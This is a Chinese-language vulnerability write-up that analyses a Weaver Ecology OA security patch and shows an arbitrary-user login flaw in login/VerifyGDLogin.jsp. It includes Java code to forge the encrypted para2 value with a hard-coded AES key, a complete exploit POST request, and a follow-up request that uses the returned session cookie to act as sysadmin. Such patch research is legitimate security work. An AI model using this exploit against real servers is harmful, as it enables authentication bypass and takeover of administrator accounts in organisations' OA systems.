0x01 前言
在跟踪泛微补丁包时发现Ecology_security_20230725_v9.0_v10.58.3的SecurityRuleGdLogin0317的补丁疑似修复了一个SQL注入,因此跟踪下看看
上图为补丁关键操作,看内容像是进行了SQL注入检测,后续分析发现是一处任意用户登录
0x02 分析
跟踪关键文件login/VerifyGDLogin.jsp
看源码为从URI中获取para、para1、para2后调用PoppupRemindInfoUtil.decrypt对para2做解密,然后通过weaver.login.VerifyGDLogin#getUserCheck方法进行登录校验
其中PoppupRemindInfoUtil.decrypt方法首先会校验WEB-INF/prop/AESpassword.properties中的pwd项是否为空,不为空则赋值给var1,为空则给var1赋值1
然后使用SM4IntegrationUtil.USE_SM4方法判断是否启用了国密SM4加密算法,如启用则使用SM4解密,否则调用AES.decrypt进行解密,默认为false
小插曲
- 泛微在
2022-07-26(v10.49版本)修复了笔者的一个任意用户登录漏洞,10.49补丁顺带初始化了WEB-INF/prop/AESpassword.properties文件,修复前该文件的pwd为字符串NULL,修复后为随机字符,因此利用该漏洞需要配合一处任意文件读取
其中AES.decrypt方法如下
那么加密函数就为AES.encrypt,代码如下
public static String encryptAES_SunJCE(String var0, String var1) {
byte[] var2 = null;
try {
KeyGenerator var3 = KeyGenerator.getInstance("AES");
SecureRandom var4 = SecureRandom.getInstance("SHA1PRNG");
var4.setSeed(var1.getBytes());
var3.init(128, var4);
SecretKey var5 = var3.generateKey();
byte[] var6 = var5.getEncoded();
SecretKeySpec var7 = new SecretKeySpec(var6, "AES");
Cipher var8 = Cipher.getInstance("AES", "SunJCE");
byte[] var9 = var0.getBytes();
var8.init(1, var7);
var2 = var8.doFinal(var9);
} catch(NoSuchProviderException var10) {
var10.printStackTrace();
} catch(NoSuchAlgorithmException var11) {
var11.printStackTrace();
} catch(NoSuchPaddingException var12) {
var12.printStackTrace();
} catch(InvalidKeyException var13) {
var13.printStackTrace();
} catch(IllegalBlockSizeException var14) {
var14.printStackTrace();
} catch(BadPaddingException var15) {
var15.printStackTrace();
}
return var2 == null ? "" : Tools.parseByte2HexStr(var2);
}
|
生成加密数据的代码
package test;
import com.pluginweaver.utils.CryptTool;
public class testAesCrypt {
public static void main(String[] args) {
String cryptStr="1";
String enStr=CryptTool.encryptAES_SunJCE( cryptStr,"4DUa6Wq9");
System.out.println(enStr);
}
}
|
0x03 Exploit
按照前文分析构造好数据包后发送
POST /login/VerifyGDLogin.jsp HTTP/1.1
Host: 192.168.232.129
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 69
para=ViewRequest.jsp¶1=123¶2=E4D160ED60A81E804F24EE2AE592D66F
|
复制返回的ecology_JSessionid访问需要鉴权的接口即可以sysadmin登录
GET /api/hrm/login/getAccountList?__random__=1700633695101 HTTP/1.1
Host: 192.168.232.129
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
X-Requested-With: XMLHttpRequest
Content-Type: application/x-www-form-urlencoded; charset=utf-8
Accept: */*
Referer: http://192.168.232.129/wui/index.html
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: ecology_JSessionid=aaaOhmJeYzN2NbvHFv1Vy;
Connection: close
|
